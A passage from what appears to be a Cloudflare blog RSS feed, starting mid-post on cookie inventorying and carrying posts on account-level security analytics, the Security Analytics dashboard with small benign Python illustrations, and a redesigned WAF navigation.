      </a>
    </div>
    <p>Let’s imagine you run an e-commerce website <code>example.com</code>. When a user logs in to view their ongoing orders, your website would send a header with key <code>Set-Cookie</code>, and value to identify each user’s login activity:</p><ul><li><p><code>login_id=ABC123; Domain=.example.com</code></p></li></ul><p>To analyze visitor behaviors, you make use of Google Analytics that requires embedding a code snippet in all web pages. This snippet will <a href="https://support.google.com/analytics/answer/11397207">set two more cookies</a> after the pages are loaded in the browser:</p><ul><li><p><code>_ga=GA1.2; Domain=.example.com;</code></p></li><li><p><code>_ga_ABC=GS1.3; Domain=.example.com;</code></p></li></ul><p>As these two cookies from Google Analytics are considered first-party given their domain attribute, they are automatically included together with the logged-in cookie sent back to your website. The final cookie sent back for a logged-in user would be <code>Cookie: login_id=ABC123; _ga=GA1.2; _ga_ABC=GS1.3</code> with three cookies concatenated into one string, even though only one of them is directly consumed by your website.</p><p>If your website happens to be <a href="https://developers.cloudflare.com/fundamentals/concepts/how-cloudflare-works/#with-cloudflare">proxied</a> through Cloudflare already, we will observe <i>one</i> <code>Set-Cookie</code> header with cookie name of <code>login_id</code> during response, while receiving <i>three</i> cookies back: <code>login_id</code>, <code>_ga</code>, and <code>_ga_ABC</code>. Comparing <i>one</i> cookie set with <i>three</i> returned cookies, the overlapping <code>login_id</code> cookie is then tagged as set by your website directly. The same principle applies to all the requests passing through Cloudflare, allowing us to build an overview of all the first-party cookies used by your websites.</p>
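    <p>The comparison described above, matching cookie names seen in <code>Set-Cookie</code> response headers against names seen in <code>Cookie</code> request headers, can be sketched as follows. This is a simplified illustration of the principle using the example values from the text; the function names and result strings are assumptions, and real header parsing has more edge cases than shown here.</p>

```python
def set_cookie_name(set_cookie_value):
    """Return the cookie name from a Set-Cookie header value."""
    return set_cookie_value.split(";", 1)[0].split("=", 1)[0].strip()


def cookie_names(cookie_header_value):
    """Return the cookie names from a Cookie request header value."""
    names = []
    for pair in cookie_header_value.split(";"):
        name = pair.split("=", 1)[0].strip()
        if name:
            names.append(name)
    return names


def classify(set_cookie_values, cookie_header_value):
    """Tag each returned cookie by whether the origin was seen setting it."""
    set_by_site = {set_cookie_name(value) for value in set_cookie_values}
    return {
        name: "set by website" if name in set_by_site else "set elsewhere"
        for name in cookie_names(cookie_header_value)
    }
```

    <p>For the example above, calling <code>classify</code> with the single <code>login_id</code> <code>Set-Cookie</code> value and the three-cookie <code>Cookie</code> header tags <code>login_id</code> as set by the website and the two Google Analytics cookies as set elsewhere.</p>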
    <div>
      <h3>All cookies in one jar</h3>
      <a href="#all-cookies-in-one-jar">
        
      </a>
    </div>
    <p>Inventorying all the cookies set when your websites are used is a first step towards protecting your users’ privacy, and Page Shield makes this step just one click away. <a href="https://cloudflare.com/lp/pages-cookie-monitor/">Sign up now</a> to be notified when Page Shield Cookie Monitor becomes available!</p><p>...</p><p><sup>1</sup><a href="https://webkit.org/tracking-prevention/">Technically</a>, a first-party cookie is a cookie scoped to the given domain only (so not cross-domain). Such a cookie can also be set for the given domain by a third-party snippet used by the website.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Page Shield]]></category>
            <category><![CDATA[Privacy]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">7hEiD5Y4ZgRyZ2AuLkzH81</guid>
            <dc:creator>Zhiyuan Zheng</dc:creator>
        </item>
        <item>
            <title><![CDATA[Account Security Analytics and Events: better visibility over all domains]]></title>
            <link>https://blog.cloudflare.com/account-security-analytics-and-events/</link>
            <pubDate>Sat, 18 Mar 2023 17:00:00 GMT</pubDate>
            <description><![CDATA[ Revealing Account Security Analytics and Events, new eyes on your account in Cloudflare dashboard to give holistic visibility. No matter how many zones you manage, they are all there! ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/hkEsUWDVJmPQ7DAieHQCS/6571ab358294597bd14e95b5f1feb5ed/Account-level-Security-Analytics-and-Security-Events_-better-visibility-and-control-over-all-account-zones-at-once.png" />
            
            </figure><p>Cloudflare offers many security features like <a href="https://developers.cloudflare.com/waf/">WAF</a>, <a href="https://developers.cloudflare.com/bots/">Bot management</a>, <a href="https://developers.cloudflare.com/ddos-protection/">DDoS</a>, <a href="https://developers.cloudflare.com/cloudflare-one/">Zero Trust</a>, and more! This suite of products is offered in the form of rules to give basic protection against common vulnerability attacks. These rules are usually configured and monitored per domain, which is very simple when we talk about one, two, maybe three domains (or what we call in Cloudflare’s terms, “zones”).</p>
    <div>
      <h3>The zone-level overview sometimes is not time efficient</h3>
      <a href="#the-zone-level-overview-sometimes-is-not-time-efficient">
        
      </a>
    </div>
    <p>If you’re a Cloudflare customer with tens, hundreds, or even thousands of domains under your control, you’d spend hours going through these domains one by one, monitoring and configuring all security features. We know that’s a pain, especially for our Enterprise customers. That’s why last September we announced the <a href="/account-waf/">Account WAF</a>, where you can create one security rule and have it applied to the configuration of all your zones at once!</p><p>Account WAF makes it easy to deploy security configurations. Following the same philosophy, we want to empower our customers by providing visibility over these configurations, or even better, visibility on all HTTP traffic.</p><p>Today, Cloudflare is offering holistic views on the security suite by launching Account Security Analytics and Account Security Events. Now, across all your domains, you can monitor traffic, get insights quicker, and save hours of your time.</p>
    <div>
      <h3>How do customers get visibility over security traffic today?</h3>
      <a href="#how-do-customers-get-visibility-over-security-traffic-today">
        
      </a>
    </div>
    <p>Before today, to view account analytics or events, customers had two options. They could access each zone individually to check the events and analytics dashboards. Alternatively, where ready-made dashboards were not provided, they could use the zone <a href="https://developers.cloudflare.com/analytics/graphql-api/">GraphQL Analytics API</a> or logs to collect data and send it to their preferred storage provider, where they could aggregate it and plot graphs to get insights for all zones under their account.</p>
    <div>
      <h3>Introducing Account Security Analytics and Events</h3>
      <a href="#introducing-account-security-analytics-and-events">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6gWJhl65y6sUNRHNaZjwqt/d2a107ab79c0a3da65c4721a1b48fa74/Screenshot-2023-03-17-at-9.57.13-AM.png" />
            
            </figure><p>The new views are security-focused, data-driven dashboards. Similar to the zone-level views, both show sampled logs and the top filters over many source dimensions (for example, IP addresses, Host, Country, ASN, etc.).</p><p>The main difference between them is that Account Security Events focuses on the current configurations on every zone you have, which makes reviewing mitigated requests (rule matches) easy. This step is essential in distinguishing actual threats from false positives, along with maintaining optimal security configuration.</p><p>Part of the power of Security Events is showing Events “by service”, listing the security-related activity per security feature (for example, <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAF</a>, Firewall Rules, API Shield), and Events “by Action” (for example, allow, block, challenge).</p><p>On the other hand, the Account Security Analytics view shows a wider angle with all HTTP traffic on all zones under the account, whether this traffic is mitigated, i.e., the security configurations took an action to prevent the request from reaching your zone, or not mitigated. This is essential in fine-tuning your security configuration, finding possible false negatives, or onboarding new zones.</p><p>For ease of use, the view also provides quick filters and insights into what we think are interesting cases worth exploring. Many of the view components are similar to the zone-level <a href="/security-analytics/">Security Analytics</a> that we introduced recently.</p><p>To get to know the components and how they interact, let’s have a look at an actual example.</p>
    <div>
      <h3>Analytics walk-through when investigating a spike in traffic</h3>
      <a href="#analytics-walk-through-when-investigating-a-spike-in-traffic">
        
      </a>
    </div>
    <p>Traffic spikes happen to many customers’ accounts. To investigate the reason behind a spike and check what is missing from your configuration, we recommend starting from Analytics, as it shows both mitigated and non-mitigated traffic. To review the mitigated requests and double-check for false positives, Security Events is the go-to place. That’s what we’ll do in this walk-through: start with Analytics, find a spike, and check whether further mitigation is needed.</p><p><b>Step 1:</b> To navigate to the new views, sign in to the Cloudflare dashboard and select the account you want to monitor. You will find <b>Security Analytics</b> and <b>Security Events</b> in the sidebar under <b>Security Center.</b></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6GQ2Z3yAa1OehelJegPHZU/ffc7db3bde4a6976ed94e6eab597458c/pasted-image-0--8--2.png" />
            
            </figure><p><b>Step 2:</b> In the Analytics dashboard, if you see a big spike in traffic compared to the usual level, there’s a good chance it’s a layer 7 DDoS attack. Once you spot one, zoom into the time interval in the graph.</p><div></div>
<i>Zooming into a traffic spike on the timeseries scale</i><br /><p>Expanding the top-N statistics at the top of the Analytics page reveals several observations:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5XDngTA5PHz7hc0O8f7RJ8/5bfe5659e3eafa42689d998f2de886a3/pasted-image-0--9--1.png" />
            
            </figure><p>We can confirm it’s a DDoS attack because the peak of traffic does not come from a single IP address; it’s distributed over multiple source IPs. The “edge status code” indicates that a rate limiting rule was applied to this attack, and the requests use the GET method over HTTP/2.</p><p>Looking at the right-hand side of the analytics, “Attack Analysis” indicates that these requests were clean of <a href="https://www.cloudflare.com/learning/security/how-to-prevent-xss-attacks/">XSS</a>, SQLi, and common RCE attacks. The Bot Analysis indicates that the traffic is automated, based on the Bot Scores distribution. These two products add another layer of intelligence to the investigation process. We can deduce that the attacker is sending clean requests in a high-volume attack from multiple IPs to take the web application down.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3mBN0yDIQo4aK0HAXCO5Yb/98fe973514f449147b3171e579c2dbce/pasted-image-0--10--1.png" />
            
            </figure><p><b>Step 3:</b> For this attack, we can see that rules are already in place to mitigate it. With this visibility, we have the freedom to fine-tune our configuration for a better security posture, if needed. We can filter on the attack fingerprint: for instance, add a filter on the referer `www.example.com`, which receives the bulk of the attack requests, add filters on path equals `/`, HTTP method, and query string, and add a filter on automated traffic using Bot score. We will then see the following:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6bI1AAaTSFbA7nPxvx4lZn/2f8197708c7dc3ac8d842ff2c003b4eb/pasted-image-0--11-.png" />
            
            </figure><p><b>Step 4:</b> Jump to Security Events to zoom in on the mitigation actions. In this case, the spike fingerprint is mitigated by two actions: Managed Challenge and Block.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6JuvFbzYoI01oHDIrCh7ze/3e21d9d444699434a28e25eea8422423/pasted-image-0--12-.png" />
            
            </figure><p>The mitigation was applied by Firewall rules and DDoS configurations; the exact rules are shown in the top events.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/20ANCsBgB0TowOniXpMl0E/1e4445f96e05af157c3174314422513b/pasted-image-0--13-.png" />
            
            </figure>
    <div>
      <h3>Who gets the new views?</h3>
      <a href="#who-gets-the-new-views">
        
      </a>
    </div>
    <p>Starting this week, all our customers on Enterprise plans will have access to Account Security Analytics and Security Events. For full visibility and the full set of actions, we recommend also having Account Bot Management, WAF Attack Score, and Account WAF.</p>
    <div>
      <h3>What’s next?</h3>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>The new Account Security Analytics and Events encompass metadata generated by the Cloudflare network for all domains in one place. Over the coming period, we will keep improving the experience to save our customers time. The views are currently in beta: log in to the dashboard, check them out, and let us know your feedback.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Dashboard]]></category>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">7lBffZk4kfTbrZ48l1NMo8</guid>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Nick Downie</dc:creator>
        </item>
        <item>
            <title><![CDATA[New! Security Analytics provides a comprehensive view across all your traffic]]></title>
            <link>https://blog.cloudflare.com/security-analytics/</link>
            <pubDate>Fri, 09 Dec 2022 14:00:00 GMT</pubDate>
            <description><![CDATA[ Security Analytics gives you a security lens across all of your HTTP traffic, not only mitigated requests, allowing you to focus on what matters most: traffic deemed malicious but potentially not mitigated. ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/fqA2JqcTEUftqWAiKfPHt/14eaa1a9b78a1785a3bd449a776eb204/unnamed-1.png" />
            
            </figure><p>An application proxying traffic through Cloudflare benefits from a wide range of easy-to-use security features, including <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAF</a>, Bot Management, and DDoS mitigation. To understand whether traffic has been blocked by Cloudflare, we built a powerful <a href="/new-firewall-tab-and-analytics/">Security Events</a> dashboard that allows you to examine any mitigation events. Application owners often wonder, though, what happened to the rest of their traffic: did they block all traffic that was detected as malicious?</p><p>Today, along with our announcement of the <a href="/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/">WAF Attack Score</a>, we are also launching our new Security Analytics.</p><p>Security Analytics gives you a security lens across all of your HTTP traffic, not only mitigated requests, allowing you to focus on what matters most: traffic deemed malicious but potentially not mitigated.</p>
    <div>
      <h2>Detect then mitigate</h2>
      <a href="#detect-then-mitigate">
        
      </a>
    </div>
    <p>Imagine you just onboarded your application to Cloudflare and without any additional effort, each HTTP request is analyzed by the Cloudflare network. Analytics are therefore enriched with attack analysis, bot analysis and any other security signal provided by Cloudflare.</p><p>Right away, without any risk of causing false positives, you can view the entirety of your traffic to explore what is happening, when and where.</p><p>This allows you to dive straight into analyzing the results of these signals, shortening the time taken to deploy active blocking mitigations and boosting your confidence in making decisions.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2gYype09S9vHFehn1Ltvln/a333ca9cdf3dd7397e9a012dbd758134/image6-1.png" />
            
            </figure><p>We are calling this approach “<i>detect then mitigate</i>” and we have already received very positive feedback from early access customers.</p><p>In fact, Cloudflare’s Bot Management has been <a href="/introducing-bot-analytics/">using this model</a> for the past two years. We constantly hear from our customers that greater visibility gives them high confidence in our bot scoring solution. To further support this way of securing your web applications, and to bring together all our intelligent signals, we designed and developed the new Security Analytics, which begins to bring in signals from the WAF and other security products to follow this model.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4GSZTeBSY0shIKt5dTE66k/fd166416500386e0549c6e7ad460bc8d/image4-6.png" />
            
            </figure>
    <div>
      <h2>New Security Analytics</h2>
      <a href="#new-security-analytics">
        
      </a>
    </div>
    <p>Building on the success of our analytics experiences, the new Security Analytics employs existing components such as top statistics and in-context quick filters, with a new page layout that allows for rapid exploration and validation. The following sections break down this new page layout into a high-level workflow.</p><p>The key difference between Security Analytics and Security Events is that the former is based on HTTP requests, which gives visibility into your entire site’s traffic, while Security Events uses a different dataset that records whenever there is a match with any active security rule.</p>
    <div>
      <h3>Define a focus</h3>
      <a href="#define-a-focus">
        
      </a>
    </div>
    <p>The new Security Analytics visualizes the dataset of sampled HTTP requests across your entire application, the same as <a href="/introducing-bot-analytics/">Bot Analytics</a>. When validating the “<i>detect then mitigate</i>” model with selected customers, we observed a common behavior: using the top N statistics to quickly narrow down to either obvious anomalies or certain parts of the application. Based on this insight, the page starts with selected top N statistics covering both request sources and request destinations, and can be expanded to view all the statistics available. Questions like “How well is my application admin’s area protected?” can be answered with one or two quick filter clicks in this area.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/eVviZy7T8NtFwd5igw3Y7/a573e8bc96b2d8bc788ff483c1dc4189/image2-8.png" />
            
            </figure>
    <div>
      <h3>Spot anomalies in trends</h3>
      <a href="#spot-anomalies-in-trends">
        
      </a>
    </div>
    <p>After a preliminary focus is defined, the core of the interface is dedicated to plotting trends over time. The time series chart has proven to be a powerful tool for spotting traffic anomalies, and it allows plotting based on different criteria. Whenever there is a spike, it is likely that an attack or attack attempt has happened.</p><p>As mentioned above, unlike <a href="/new-firewall-tab-and-analytics/">Security Events</a>, the dataset used on this page is HTTP requests, which includes both mitigated and not mitigated requests. By <a href="/application-security/#definitions">mitigated requests</a> here, we mean “any HTTP request that had a ‘terminating’ action applied by the Cloudflare platform”. The remaining requests, which have not been mitigated, are either served by Cloudflare’s cache or reach the origin. If, for example, there is a spike in not mitigated requests while mitigated requests stay flat, one assumption could be that there was an attack that did not match any active WAF rule. In this case, you can filter on not mitigated requests with one click, right in the chart, which updates all the data visualized on this page to support further investigation.</p><p>In addition to the default plotting of not mitigated and mitigated requests, you can also choose to plot trends of either attack analysis or bot analysis, allowing you to spot anomalies in attack or bot behaviors.</p>
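    <p>The “spike in not mitigated requests while mitigated requests stay flat” pattern described above can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the function name, the per-bucket request counts, and the median-based baseline with a 3x factor are all hypothetical and are not how the dashboard itself detects anomalies.</p>

```python
from statistics import median

def unmitigated_spikes(not_mitigated, mitigated, factor=3.0):
    """Return indexes of time buckets where not-mitigated traffic spikes
    while mitigated traffic stays close to its own baseline.

    Both inputs are per-bucket request counts of equal length.
    The median baseline and the factor are illustrative assumptions.
    """
    # Use at least 1 as the baseline so an all-zero series does not
    # make every bucket look like a spike.
    base_not_mitigated = max(median(not_mitigated), 1)
    base_mitigated = max(median(mitigated), 1)

    spikes = []
    for i, (nm, m) in enumerate(zip(not_mitigated, mitigated)):
        is_spiking = nm >= factor * base_not_mitigated
        mitigated_is_flat = factor * base_mitigated >= m
        if is_spiking and mitigated_is_flat:
            spikes.append(i)
    return spikes

# Hypothetical counts per 5-minute bucket.
not_mitigated = [100, 110, 95, 900, 105]
mitigated = [10, 12, 11, 12, 10]
print(unmitigated_spikes(not_mitigated, mitigated))
```

    <p>A bucket flagged this way is a candidate for the one-click filter on not mitigated requests; the sampled logs then show whether the traffic really is an attack that no active rule matched.</p>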
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/68ZPoNtii7Si5DF06pxVVY/cec0589f2c78dc23cc9501cdb070bfa2/image7-2.png" />
            
            </figure>
    <div>
      <h3>Zoom in with analysis signals</h3>
      <a href="#zoom-in-with-analysis-signals">
        
      </a>
    </div>
    <p>One of the most loved and trusted analysis signals by our customers is the bot score. With the latest addition of <a href="/stop-attacks-before-they-are-known-making-the-cloudflare-waf-smarter/">WAF Attack Score</a> and <a href="https://developers.cloudflare.com/waf/about/content-scanning/">content scanning</a>, we are bringing them together into one analytics page, helping you further zoom into your traffic based on some of these signals. The combination of these signals enables you to find answers to scenarios not possible until now:</p><ul><li><p>Attack requests made by (definite) automated sources</p></li><li><p>Likely attack requests made by humans</p></li><li><p>Content uploaded with/without malicious content made by bots</p></li></ul><p>Once a scenario is filtered on, the data visualization of the entire page including the top N statistics, HTTP requests trend and sampled log will be updated, allowing you to spot any anomalies among either one of the top N statistics or the time based HTTP requests trend.</p>
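    <p>As a rough sketch of how two signals combine into the scenarios listed above, the Python below labels a request from its bot score and WAF attack score. The score bands are assumptions chosen for illustration (low bot score meaning automated, low attack score meaning attack); they are not taken from this post, and the function and constant names are hypothetical.</p>

```python
from typing import Optional

# All bands below are assumptions for illustration, not values from this post.
ATTACK_SCORES = range(1, 21)             # assumed "attack" band
LIKELY_ATTACK_SCORES = range(21, 51)     # assumed "likely attack" band
AUTOMATED_BOT_SCORES = range(1, 2)       # assumed "definitely automated" (score 1)
LIKELY_HUMAN_BOT_SCORES = range(30, 100) # assumed "likely human" band

def scenario(bot_score: int, attack_score: int) -> Optional[str]:
    """Label a request with one of the combined scenarios, or None."""
    if attack_score in ATTACK_SCORES and bot_score in AUTOMATED_BOT_SCORES:
        return "attack request from an automated source"
    if attack_score in LIKELY_ATTACK_SCORES and bot_score in LIKELY_HUMAN_BOT_SCORES:
        return "likely attack request from a human"
    return None

# Hypothetical sampled requests as (bot_score, attack_score) pairs.
for bot, attack in [(1, 5), (80, 35), (80, 90)]:
    print(bot, attack, scenario(bot, attack))
```

    <p>In the dashboard, the equivalent step is applying both filters at once; the point of the sketch is only that each scenario is the intersection of one band from each signal.</p>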
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6L7LxXT1BLhWp71Im6heox/d8e9155a5e0e81f1bf0236a272509d0a/image3-3.png" />
            
            </figure>
    <div>
      <h3>Review sampled logs</h3>
      <a href="#review-sampled-logs">
        
      </a>
    </div>
    <p>After zooming into a specific part of your traffic that may be an anomaly, sampled logs provide a detailed view to verify your finding per HTTP request. This is a crucial step in a security study workflow, as shown by the high engagement rate we see in the usage data for such logs in Security Events. As we add more data to each log entry, the expanded log view becomes less readable over time. We have therefore redesigned the expanded view: it starts with how Cloudflare responded to a request, followed by our analysis signals, and lastly the key components of the raw request itself. By reviewing these details, you can validate your hypothesis of an anomaly and decide whether any mitigation action is required.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3gJjGLYzonj0aPVZLIKC6S/9cc34a61775198999e4f1eb8c4dd90f6/image5-3.png" />
            
            </figure>
    <div>
      <h3>Handy insights to get started</h3>
      <a href="#handy-insights-to-get-started">
        
      </a>
    </div>
    <p>When testing the prototype of this analytics dashboard internally, we learned that the power of flexibility comes with a steeper learning curve. To help you get started, we designed a handy <i>insights</i> panel. These insights are crafted to highlight specific perspectives on your total traffic. With a single click on any one of the insights, a preset of filters is applied, zooming directly onto the portion of your traffic that you are interested in. From here, you can review the sampled logs or further fine-tune any of the applied filters. Further internal studies have shown this to be a highly efficient workflow, and in many cases it will be your starting point for using this dashboard.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1l8PBc150OLKligyn93h76/bc692e61e0f0d8c11ec1719c3195a169/image1-11.png" />
            
            </figure>
    <div>
      <h2>How can I get it?</h2>
      <a href="#how-can-i-get-it">
        
      </a>
    </div>
    <p>The new Security Analytics is being gradually rolled out to all Enterprise customers who have purchased the new Application Security Core or Advanced Bundles. We plan to roll this out to all other customers in the near future. This new view will be alongside the existing Security Events dashboard.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Q5OP1vAN2KM82LN4vBqp2/b7944b44d8d7bb03baa8b39909c72f16/image8-2.png" />
            
            </figure>
    <div>
      <h2>What’s next</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>We are still at an early stage moving towards the “<i>detect then mitigate”</i> model, empowering you with greater visibility and intelligence to better protect your web applications. While we are working on enabling more detection capabilities, please share your thoughts and feedback with us to help us improve the experience. If you want to get access sooner, reach out to your account team to get started!</p> ]]></content:encoded>
            <category><![CDATA[Application Services]]></category>
            <category><![CDATA[Analytics]]></category>
            <guid isPermaLink="false">38y228bpRNFVIIfHyptrzx</guid>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Nick Downie</dc:creator>
            <dc:creator>Radwa Radwan</dc:creator>
        </item>
        <item>
            <title><![CDATA[A new WAF experience]]></title>
            <link>https://blog.cloudflare.com/new-waf-experience/</link>
            <pubDate>Tue, 15 Mar 2022 12:59:06 GMT</pubDate>
            <description><![CDATA[ The security landscape is moving fast. We invited users to help us shape a new WAF experience that enables us to evolve WAF to meet their demands and use cases ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5AshmKNvJcvQs9VcqUCAp8/b5128c88e4eb56e13d06b710e2b9861b/image2-28.png" />
            
            </figure><p>Around three years ago, we brought multiple features into the <a href="/new-firewall-tab-and-analytics/">Firewall tab</a> in our dashboard navigation, with the motivation “to make our products and services intuitive.” With our hard work in <a href="/tag/waf/">expanding capabilities offerings</a> in the past three years, we want to take another opportunity to evaluate the intuitiveness of <a href="https://www.cloudflare.com/waf/">Cloudflare WAF (Web Application Firewall)</a>.</p>
    <div>
      <h3>Our customers lead the way to new WAF</h3>
      <a href="#our-customers-lead-the-way-to-new-waf">
        
      </a>
    </div>
    <p>The security landscape is moving fast; types of web applications are growing rapidly; and within the industry there are various approaches to what a <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">WAF</a> includes and can offer. Cloudflare not only proxies enterprise applications, but also millions of personal blogs, community sites, and small business stores. This diversity of use cases is covered by the various products we offer; however, these products are currently scattered, which makes it unclear which protection rules are active. This pushes us to reflect on how we can best support our customers in getting the most value out of WAF by providing a clearer offering that meets expectations.</p><p>A few months ago, we reached out to our customers to answer a simple question: what do you consider to be part of WAF? We employed a range of user research methods including card sorting, tree testing, design evaluation, and surveys to help with this. The results of this research illustrated how our customers think about WAF, what it means to them, and how it supports their use cases. This inspired the product team to expand scope and contemplate what (Web Application) Security means, beyond merely the WAF.</p><p>Based on what hundreds of customers told us, our user research and product design teams collaborated with product management to rethink the security experience. We examined our assumptions and assessed the effectiveness of design concepts to create a structure (or information architecture) that reflected our customers’ mental models.</p><p>This new structure consolidates firewall rules, managed rules, and rate limiting rules to become a part of WAF. 
The new WAF strives to be the one-stop shop for web application security as it pertains to differentiating malicious from clean traffic.</p><p>As of today, you will see the following changes to our navigation:</p><ol><li><p><b>Firewall</b> is being renamed to <b>Security.</b></p></li><li><p>Under <b>Security,</b> you will now find <b>WAF.</b></p></li><li><p>Firewall rules, managed rules, and rate limiting rules will now appear under <b>WAF</b>.</p></li></ol><blockquote><p>From now on, when we refer to <b>WAF,</b> we will be referring to the above three features.</p></blockquote><p>Further, some important updates are coming for these features. Advanced rate limiting rules will be launched as part of <a href="/welcome-security-week-2022/">Security Week</a>, and every customer will also get a free set of managed rules to <a href="/waf-for-everyone">protect all traffic from high profile vulnerabilities</a>. And finally, in the next few months, firewall rules will move to the <a href="https://developers.cloudflare.com/ruleset-engine/">Ruleset Engine</a>, adding more powerful capabilities thanks to the new Ruleset API. Feeling excited?</p>
    <div>
      <h3>How customers shaped the future of WAF</h3>
      <a href="#how-customers-shaped-the-future-of-waf">
        
      </a>
    </div>
    <p>Almost 500 customers participated in this user research study that helped us learn about needs and context of use. We employed four research methods, all of which were conducted in an unmoderated manner; this meant people around the world could participate remotely at a time and place of their choosing.</p><ul><li><p>Card sorting involved participants grouping navigational elements into categories that made sense to them.</p></li><li><p>Tree testing assessed how well or poorly a proposed navigational structure performed for our target audience.</p></li><li><p>Design evaluation involved a task-based approach to measure effectiveness and utility of design concepts.</p></li><li><p>Survey questions helped us dive deeper into results, as well as painting a picture of our participants.</p></li></ul><p>Results of this four-pronged study informed changes to both WAF and Security that are detailed below.</p>
    <div>
      <h3>The new WAF experience</h3>
      <a href="#the-new-waf-experience">
        
      </a>
    </div>
    <p>The final result reveals the WAF as part of a broader <a href="https://dash.cloudflare.com/?to=/:account/:zone/security">Security category</a>, which also includes Bots, DDoS, API Shield and Page Shield. This destination enables you to create your rules (a.k.a. firewall rules), deploy Cloudflare managed rules, set rate limit conditions, and includes handy tools to protect your web applications.</p><p>All customers across <a href="https://www.cloudflare.com/plans/">all plans</a> will now see the WAF products organized as below:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/777dWCpcmkac0c5KHZz4jp/6728da9e7d713d567a524faeb7f0b905/image1-29.png" />
            
            </figure><ol><li><p><b>Firewall rules</b> allow you to create custom, user-defined logic that blocks or allows traffic, leveraging all the components of the HTTP request and dynamic fields computed by Cloudflare, such as Bot score.</p></li><li><p><b>Rate limiting rules</b> include the traditional IP-based product we launched back in 2018 and the newer Advanced Rate Limiting for Enterprise customers on the Advanced plan (coming soon).</p></li><li><p><b>Managed rules</b> allow customers to deploy sets of rules managed by the Cloudflare analyst team. These rulesets include a “Cloudflare Free Managed Ruleset” currently being rolled out <a href="/waf-for-everyone">for all plans</a> including FREE, as well as Cloudflare Managed, OWASP implementation, and Exposed Credentials Check for all paying plans.</p></li><li><p><b>Tools</b> give access to IP Access Rules, Zone Lockdown and User Agent Blocking. Although still actively supported, these products cover specific use cases that can also be covered using firewall rules. However, they remain a part of the WAF toolbox for convenience.</p></li></ol>
    <div>
      <h3>Redesigning the WAF experience</h3>
      <a href="#redesigning-the-waf-experience">
        
      </a>
    </div>
    <p>Gestalt design principles suggest that “elements which are close in proximity to each other are perceived to share similar functionality or traits.” This principle, together with the input from our customers, informed our design decisions.</p><p>After reviewing the responses of the study, we understood the importance of making it easy to find the security products in the Dashboard, and the need to make it clear how particular products were related to or worked together with each other.</p><p>Crucially, the page needed to:</p><ul><li><p>Display each type of rule we support, i.e. firewall rules, rate limiting rules and managed rules</p></li><li><p>Show the usage amount of each type</p></li><li><p>Give the customer the ability to add a new rule and manage existing rules</p></li><li><p>Allow the customer to reprioritise rules using the existing drag and drop behavior</p></li><li><p>Be flexible enough to accommodate future additions and consolidations of WAF features</p></li></ul><p>We iterated on multiple options, including predominantly vertical page layouts, table-based page layouts, and even accordion-based page layouts. Each of these options, however, would have forced us to replicate buttons of similar functionality on the page. Given the risk of causing additional confusion, we abandoned these options in favor of a horizontal, tabbed page layout.</p>
    <div>
      <h3>How can I get it?</h3>
      <a href="#how-can-i-get-it">
        
      </a>
    </div>
    <p>As of today, we are launching this new design of WAF to everyone! In the meantime, we are updating documentation to walk you through how to maximize the power of Cloudflare WAF.</p>
    <div>
      <h3>Looking forward</h3>
      <a href="#looking-forward">
        
      </a>
    </div>
    <p>This is the starting point of our journey to make Cloudflare WAF not only powerful but also easy to adapt to your needs. We are evaluating approaches to empower your decision-making process when protecting your web applications. With growing threat intelligence and more rule creation possibilities, we want to shorten your path from detecting a possible threat (such as in the security overview) to setting up the right rule to mitigate it. Stay tuned!</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Firewall]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Product Design]]></category>
            <category><![CDATA[Design]]></category>
            <guid isPermaLink="false">2UUR6KEw3qV6N5GMCAV7eS</guid>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Mru Kodali</dc:creator>
            <dc:creator>Syeef Karim</dc:creator>
            <dc:creator>Daniele Molteni</dc:creator>
        </item>
    </channel>
